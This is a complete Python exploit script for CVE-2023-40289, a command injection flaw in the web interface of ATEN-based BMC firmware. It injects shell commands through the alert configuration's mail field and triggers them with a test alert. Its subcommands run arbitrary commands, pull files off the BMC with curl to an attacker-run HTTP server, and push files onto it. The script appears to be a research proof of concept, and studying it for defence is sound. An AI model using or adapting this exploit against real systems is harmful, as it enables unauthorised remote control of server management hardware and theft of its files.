README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Exploit for CVE-2023-40289, a command injection vulnerability in ATEN's BMC firmware.
Based on information and code from https://binarly.io/advisories/BRLY-2023-001/
"""
import queue
import re
import stat
import sys
import threading
import time
import typing as t
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path, PurePosixPath
import click
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@dataclass
class CliArgs:
target: str
lhost: str
lport: int
delay: int | float
class Handler(BaseHTTPRequestHandler):
"""Simple handler for HTTP requests."""
def do_GET(self):
"""Handle an HTTP GET request. Simply return static file content."""
self.send_response(200) # OK
self.send_header("Conent-Type", "application/octet-stream")
self.end_headers()
self.wfile.write(self.server.static_content)
def do_POST(self):
"""Handle an HTTP POST request. Store the request body in the server's queue."""
content_length = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(content_length)
self.send_response(202) # Accepted
self.end_headers()
self.server.q.put(body)
def log_message(self, *args):
# Noop method to silence the send_response method.
pass
def run_http_server(static_content: bytes = b""):
"""Run an HTTP server in a background thread.
This server only accepts a single request and terminates after handling it.
Args:
static_content: Static content to server for GET requests.
Returns:
A tuple consisting of the background thread and a Queue from which the content of a
POST request can be read.
"""
handler = HTTPServer(("", args.lport), Handler)
# Attach a queue for communicating data back to the main thread.
q: queue.Queue[bytes] = queue.Queue()
handler.q = q
# Attach some static content to serve to GET requests.
handler.static_content = static_content
# Run an HTTP server in a background thread.
thread = threading.Thread(target=handler.handle_request)
thread.daemon = True
thread.start()
return thread, q
def store_payload(payload: str, index: int = 0):
"""Store the payload command in the target BMC's configuration.
Args:
payload: The command to run on the target BMC.
index: Store the command at this alert index.
Raises:
ValueError: The payload is too long.
RuntimeError: The target did not accept the payload.
"""
if not payload.startswith(";"):
payload = f";{payload}"
if "@" not in payload:
# The payload is only accepted if it contains an @ somewhere. Prepending an @ does
# not do any harm, except that it increases the length. So we only do it if
# necessary.
payload = f"@{payload}"
if len(payload) >= 64:
raise ValueError(
f"Payload too long ({len(payload)} chars). A maximum of 63 character is allowed. Sorry."
)
# End the command. It does not seem to hurt if this brings the payload over the length
# limit.
payload += ";:"
data = {
"op": "config_alert",
"destination": "192.168.0.10",
"severity": "16",
"mail": payload,
"sub": "test",
"msg": "test",
"index": str(index),
"fun": "m",
}
r = session.post(url, data=data, verify=False)
if r.status_code != 200:
raise RuntimeError(
f"Could not store payload {payload} at index {index}. Target returned {r.status_code} ({r.reason})."
)
def trigger_exploit(index: int = 0) -> None:
"""Trigger running a previously stored payload command.
Args:
index: Trigger the command stored at this alert index.
Raises:
RuntimeError: The target BMC returned an unexpected error.
"""
data = {"op": "send_test_alert", "index": str(index)}
r = session.post(url, data=data, verify=False)
if r.status_code != 200:
raise RuntimeError(
f"Could not trigger exploit at index {index}. Target returned {r.status_code} ({r.reason})."
)
def get_file(path: str | PurePosixPath, timeout: int = 15, index: int = 1) -> bytes:
"""Get the file at the given path from the BMC by triggering an upload to a local handler.
Args:
path: Absolute path of the file on the target BMC to get.
timeout: How long to wait for the upload to complete (in seconds).
index: Store the upload command at this alert index.
Returns:
The file's contents.
Raises:
RuntimeError: Waiting for the file upload timed out.
"""
thread, q = run_http_server()
# Send the file to our HTTP server.
store_payload(f"curl --data-binary @{path} {handler_url}", index=index)
time.sleep(0.1)
trigger_exploit(index=index)
# Wait for the HTTP server to finish.
for _ in range(timeout):
thread.join(1)
if not thread.is_alive():
break
else:
raise RuntimeError()
return q.get()
def login(username: str, password: str) -> None:
"""Log in to the target BMC with username and password.
Args:
username: Log in as this user.
password: The password for the given user.
Raises:
requests.ConnectionError: Could not connect to the target BMC.
requests.HTTPError: The target BMC returned an unexpected response.
"""
r = session.post(
f"{args.target}/cgi/login.cgi", {"name": username, "pwd": password}, verify=False
)
r.raise_for_status()
def set_csrf_token():
"""Get the current CSRF token value and add it to the global session object.
Raises:
requests.HTTPError: The target BMC returned an unexpected response.
"""
r = session.get(f"{args.target}/cgi/url_redirect.cgi?url_name=topmenu", verify=False)
r.raise_for_status()
m = re.search(r'SmcCsrfInsert\s*\("CSRF_TOKEN",\s*"([^"]+)"\);', r.text)
session.headers["Csrf_token"] = m.group(1)
def _disable_password_prompt(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
"""Disable the interactive prompt for the (missing) --password option.
Args:
ctx: The current click Context.
param: The current click Parameter.
value: The current click parameter's value.
Returns:
The unchanged value.
"""
if value:
for p in ctx.command.params:
if isinstance(p, click.Option) and p.name == "password":
p.prompt = None
return value
@click.group(
context_settings={"auto_envvar_prefix": "BMC"},
no_args_is_help=True,
help=r"""Exploit CVE-2023-40289 on BMCs with ATEN firmware.
/!\ Caution! This script will overwrite alerts without prompting! /!\ """,
epilog="Note: All options may also be given as environment variables with the prefix 'BMC_' (e.g. BMC_TARGET).",
)
@click.option("--target", required=True, help="URL of the target BMC's web UI.")
@click.option(
"-h",
"--lhost",
help="IP address or host name of this system to get payload output. Limited to ~35 characters.",
)
@click.option(
"-l",
"--lport",
default=80,
type=click.INT,
help="Local port to run an HTTP server on to get payload output.",
show_default=True,
)
@click.option(
"-s",
"--sid",
help="A valid session ID for an administrative user on the target system.",
callback=_disable_password_prompt,
)
@click.option(
"-u",
"--username",
help="The name of an administrative user to log in as. Ignored if --sid is given.",
)
@click.option(
"-p",
"--password",
prompt=True,
hide_input=True,
help="The password of the given user.",
)
@click.option(
"--delay",
type=click.FLOAT,
default=1.5,
show_default=True,
help="Delay between running a command and retrieving its output.",
)
def cli(target: str, lhost: str, lport: int, sid: str, username: str, password: str, delay: float):
# Store global CLI arguments for subcommands.
global args
args = CliArgs(target, lhost, lport, delay)
# Set up some basic HTTP connection parameters.
global url
url = f"{target}/cgi/op.cgi"
if sid:
session.cookies.set("SID", sid)
elif username and password:
login(username, password)
else:
raise click.UsageError("Session ID or username and password is required.")
set_csrf_token()
session.headers["Referer"] = target
if lhost:
global handler_url
# Note: We intentionally omit the URL scheme to save precious payload characters.
# Curl will figure it out.
handler_url = lhost
if lport != 80:
handler_url = f"{handler_url}:{lport}"
@cli.command(context_settings={"ignore_unknown_options": True})
@click.argument("payload", nargs=-1, type=click.UNPROCESSED)
def run(payload: str):
"""Run the PAYLOAD command on the target BMC. PAYLOAD is limited to ~61 characters."""
payload = " ".join(payload)
get_output = False
if args.lhost is None:
print("[!] Local host address not given. You will not get the output.", file=sys.stderr)
elif len(payload) < 53:
# Looks like the payload is short enough. We'll redirect the output to a file so we
# can get it later.
payload += "&>/tmp/x"
get_output = True
elif len(payload) < 54:
# Get stdout only. Better than nothing.
payload += ">/tmp/x"
get_output = True
else:
# For a long payload, we can't redirect the output, because that would bring the payload
# over the 63 character length limit.
print("[!] Payload is too long. You will not get the output.", file=sys.stderr)
# Run the payload.
store_payload(payload)
print("[✓] Set payload command", file=sys.stderr)
time.sleep(0.1)
trigger_exploit()
print("[✓] Triggered payload command", file=sys.stderr)
# Retrieve the output.
if get_output:
time.sleep(args.delay)
print("[.] Getting command output", file=sys.stderr)
try:
output = get_file("/tmp/x")
except RuntimeError:
print("[!] Could not get command output.", file=sys.stderr)
else:
if output:
try:
# Print the output as text.
print(output.decode(), end="")
except UnicodeDecodeError:
# Output is not valid UTF-8. It's probably binary data then. Output it raw.
sys.stdout.buffer.write(output)
sys.stdout.buffer.flush()
@cli.command()
@click.option(
"--dest",
default=Path("."),
type=click.Path(path_type=Path),
help="Local destination directory in which to store the file.",
)
@click.option(
"--flat/--no-flat",
default=False,
help="Do not/do replicate the original directory structure in the destination directory.",
)
@click.argument("path", type=click.Path(path_type=PurePosixPath))
def get(path: PurePosixPath, dest: Path, flat: bool) -> int:
"""Get FILE from the target BMC and save it locally."""
print(f"[.] Triggering upload of {path} from BMC.", file=sys.stderr)
try:
content = get_file(path)
except RuntimeError:
print("[!] Could not get file.", file=sys.stderr)
return 1
if not flat:
dest = dest / path.parent.relative_to("/")
dest.mkdir(parents=True, exist_ok=True)
dest = dest / path.name
dest.write_bytes(content)
print(f"[✓] File contents written to {dest}.", file=sys.stderr)
return 0
@cli.command()
@click.argument("file", type=click.Path(exists=True, dir_okay=False, path_type=Path))
@click.argument("dest", type=click.Path(path_type=PurePosixPath))
def put(file: Path, dest: PurePosixPath) -> int:
"""Write local FILE to the BMC at DEST. Will restore local permissions on the target."""
content = file.read_bytes()
mode = stat.S_IMODE(file.stat().st_mode)
# Download the file from our HTTP server.
store_payload(f"curl -o /tmp/dl {handler_url} &>/tmp/x", index=0)
if mode != 0o644:
store_payload(f"chmod {mode:o} /tmp/dl &>/tmp/x", index=1)
store_payload(f"mv /tmp/dl {dest} &>/tmp/x", index=2)
print("[✓] Set download payloads", file=sys.stderr)
time.sleep(0.1)
thread, q = run_http_server(content)
trigger_exploit(index=0)
# Wait for the HTTP server to finish.
for _ in range(15):
thread.join(1)
if not thread.is_alive():
break
else:
print("[!] BMC did not download file.", file=sys.stderr)
return 1
print(f"[✓] Downloaded {file} to BMC.", file=sys.stderr)
if mode != 0o644:
trigger_exploit(index=1)
time.sleep(args.delay)
try:
output = get_file("/tmp/x", index=3)
except RuntimeError:
print("[!] Could not get command output.", file=sys.stderr)
else:
if output:
print("[!] Could not set file mode.", file=sys.stderr)
print(output.decode(), end="", file=sys.stderr)
else:
print("[✓] Set file mode.", file=sys.stderr)
trigger_exploit(index=2)
time.sleep(args.delay)
try:
output = get_file("/tmp/x", index=3)
except RuntimeError:
print("[!] Could not get command output.", file=sys.stderr)
else:
if output:
print(f"[!] Could not move downloaded file to {dest} on BMC.", file=sys.stderr)
print(output.decode(), end="", file=sys.stderr)
else:
print(f"[✓] Moved downloaded file to {dest} on BMC.", file=sys.stderr)
return 0
# Define some global variables used throughout this script.
args: CliArgs
url: str
session = requests.Session()
handler_url: str
if __name__ == "__main__":
cli()